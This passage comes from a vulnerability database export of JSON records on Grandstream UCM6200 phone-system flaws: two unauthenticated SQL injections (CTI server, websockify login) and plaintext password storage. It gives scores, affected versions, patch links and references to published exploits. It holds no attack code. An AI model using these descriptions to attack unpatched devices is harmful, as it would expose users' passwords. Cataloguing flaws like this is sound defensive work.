                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202003-1716",
                "trust": 0.6,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-24401"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003471"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1716"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5726"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The Grandstream UCM6200 series before 1.0.20.22 is vulnerable to an SQL injection via the CTI server on port 8888. A remote unauthenticated attacker can invoke the challenge action with a crafted username and discover user passwords. Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication by the US company Grandstream",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2020-5726"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003471"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-24401"
          }
        ],
        "trust": 2.16
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2020-5726",
            "trust": 3.0
          },
          {
            "db": "TENABLE",
            "id": "TRA-2020-17",
            "trust": 2.4
          },
          {
            "db": "PACKETSTORM",
            "id": "156977",
            "trust": 1.6
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003471",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-24401",
            "trust": 0.6
          },
          {
            "db": "EXPLOIT-DB",
            "id": "48270",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1716",
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-24401"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003471"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1716"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5726"
          }
        ]
      },
      "id": "VAR-202003-1439",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-24401"
          }
        ],
        "trust": 1.45714287
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-24401"
          }
        ]
      },
      "last_update_date": "2024-11-23T22:25:34.336000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "http://www.grandstream.com/"
          },
          {
            "title": "Patch for Grandstream UCM6200 SQL injection vulnerability (CNVD-2020-24401)",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/215057"
          },
          {
            "title": "Grandstream UCM6200 SQL Repair measures for injecting vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=113111"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-24401"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003471"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1716"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-89",
            "trust": 1.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003471"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5726"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.4,
            "url": "https://www.tenable.com/security/research/tra-2020-17"
          },
          {
            "trust": 1.6,
            "url": "http://packetstormsecurity.com/files/156977/grandstream-ucm6200-series-cti-interface-sql-injection.html"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2020-5726"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-5726"
          },
          {
            "trust": 0.6,
            "url": "https://www.exploit-db.com/exploits/48270"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003471"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1716"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5726"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-24401"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003471"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1716"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5726"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-04-23T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-24401"
          },
          {
            "date": "2020-04-16T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-003471"
          },
          {
            "date": "2020-03-30T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202003-1716"
          },
          {
            "date": "2020-03-30T20:15:20.180000",
            "db": "NVD",
            "id": "CVE-2020-5726"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-04-23T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-24401"
          },
          {
            "date": "2020-04-16T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-003471"
          },
          {
            "date": "2020-04-01T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202003-1716"
          },
          {
            "date": "2024-11-21T05:34:29.507000",
            "db": "NVD",
            "id": "CVE-2020-5726"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1716"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Grandstream UCM6200 In the series  SQL Injection vulnerabilities",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003471"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "SQL injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1716"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202003-1438

    Vulnerability from variot - Updated: 2024-11-23 22:25

    The Grandstream UCM6200 series before 1.0.20.22 is vulnerable to an SQL injection via the HTTP server's websockify endpoint. A remote unauthenticated attacker can invoke the login action with a crafted username and, through the use of timing attacks, can discover user passwords. Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication by the US company Grandstream. The vulnerability stems from the lack of verification of external input SQL statements by database-based applications. Attackers can use this vulnerability to execute illegal SQL commands

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202003-1438",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "ucm6204",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6208",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6202",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6202",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6204",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6208",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6200",
            "scope": "lt",
            "trust": 0.6,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20682"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003470"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5725"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:grandstream:ucm6202_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:grandstream:ucm6204_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:grandstream:ucm6208_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003470"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Jacob Baines",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1715"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2020-5725",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.6,
                "id": "CVE-2020-5725",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 1.0,
                "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Medium",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 4.3,
                "confidentialityImpact": "Partial",
                "exploitabilityScore": null,
                "id": "JVNDB-2020-003470",
                "impactScore": null,
                "integrityImpact": "None",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "Medium",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "HIGH",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 5.4,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 4.9,
                "id": "CNVD-2020-20682",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:H/Au:N/C:C/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "HIGH",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 5.9,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.2,
                "id": "CVE-2020-5725",
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "High",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 5.9,
                "baseSeverity": "Medium",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2020-003470",
                "impactScore": null,
                "integrityImpact": "None",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2020-5725",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "JVNDB-2020-003470",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2020-20682",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202003-1715",
                "trust": 0.6,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20682"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003470"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1715"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5725"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The Grandstream UCM6200 series before 1.0.20.22 is vulnerable to an SQL injection via the HTTP server\u0027s websockify endpoint. A remote unauthenticated attacker can invoke the login action with a crafted username and, through the use of timing attacks, can discover user passwords. Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication by the US company Grandstream. The vulnerability stems from the lack of verification of external input SQL statements by database-based applications. Attackers can use this vulnerability to execute illegal SQL commands",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2020-5725"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003470"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-20682"
          }
        ],
        "trust": 2.16
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2020-5725",
            "trust": 3.0
          },
          {
            "db": "TENABLE",
            "id": "TRA-2020-17",
            "trust": 2.4
          },
          {
            "db": "PACKETSTORM",
            "id": "156976",
            "trust": 1.6
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003470",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-20682",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1715",
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20682"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003470"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1715"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5725"
          }
        ]
      },
      "id": "VAR-202003-1438",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20682"
          }
        ],
        "trust": 1.45714287
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20682"
          }
        ]
      },
      "last_update_date": "2024-11-23T22:25:34.309000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "http://www.grandstream.com/"
          },
          {
            "title": "Patch for Grandstream UCM6200 SQL injection vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/211861"
          },
          {
            "title": "Grandstream UCM6200 SQL Repair measures for injecting vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=113110"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20682"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003470"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1715"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-89",
            "trust": 1.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003470"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5725"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.6,
            "url": "https://www.tenable.com/security/research/tra-2020-17"
          },
          {
            "trust": 1.6,
            "url": "http://packetstormsecurity.com/files/156976/grandstream-ucm6200-series-websocket-1.0.20.20-sql-injection.html"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2020-5725"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-5725"
          },
          {
            "trust": 0.8,
            "url": "https://jp.tenable.com/security/research/tra-2020-17?tns_redirect=true"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003470"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1715"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5725"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20682"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003470"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1715"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5725"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-03-31T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-20682"
          },
          {
            "date": "2020-04-16T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-003470"
          },
          {
            "date": "2020-03-30T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202003-1715"
          },
          {
            "date": "2020-03-30T20:15:20.133000",
            "db": "NVD",
            "id": "CVE-2020-5725"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-04-01T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-20682"
          },
          {
            "date": "2020-04-16T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-003470"
          },
          {
            "date": "2020-04-01T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202003-1715"
          },
          {
            "date": "2024-11-21T05:34:29.400000",
            "db": "NVD",
            "id": "CVE-2020-5725"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1715"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Grandstream UCM6200 SQL injection vulnerability",
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20682"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1715"
          }
        ],
        "trust": 1.2
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "SQL injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1715"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202003-1436

    Vulnerability from variot - Updated: 2024-11-23 22:25

    The UCM6200 series 1.0.20.22 and below stores unencrypted user passwords in an SQLite database. This could allow an attacker to retrieve all passwords and possibly gain elevated privileges. UCM6200 The series contains a vulnerability in the plaintext storage of important information.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication by the US company Grandstream.

    Grandstream UCM6200 series 1.0.20.22 and previous versions have security vulnerabilities

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202003-1436",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "ucm6204",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6208",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6202",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6202",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6204",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6208",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6200",
            "scope": "lte",
            "trust": 0.6,
            "vendor": "grandstream",
            "version": "\u003c=1.0.20.22"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20679"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003514"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5723"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:grandstream:ucm6202_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:grandstream:ucm6204_firmware",
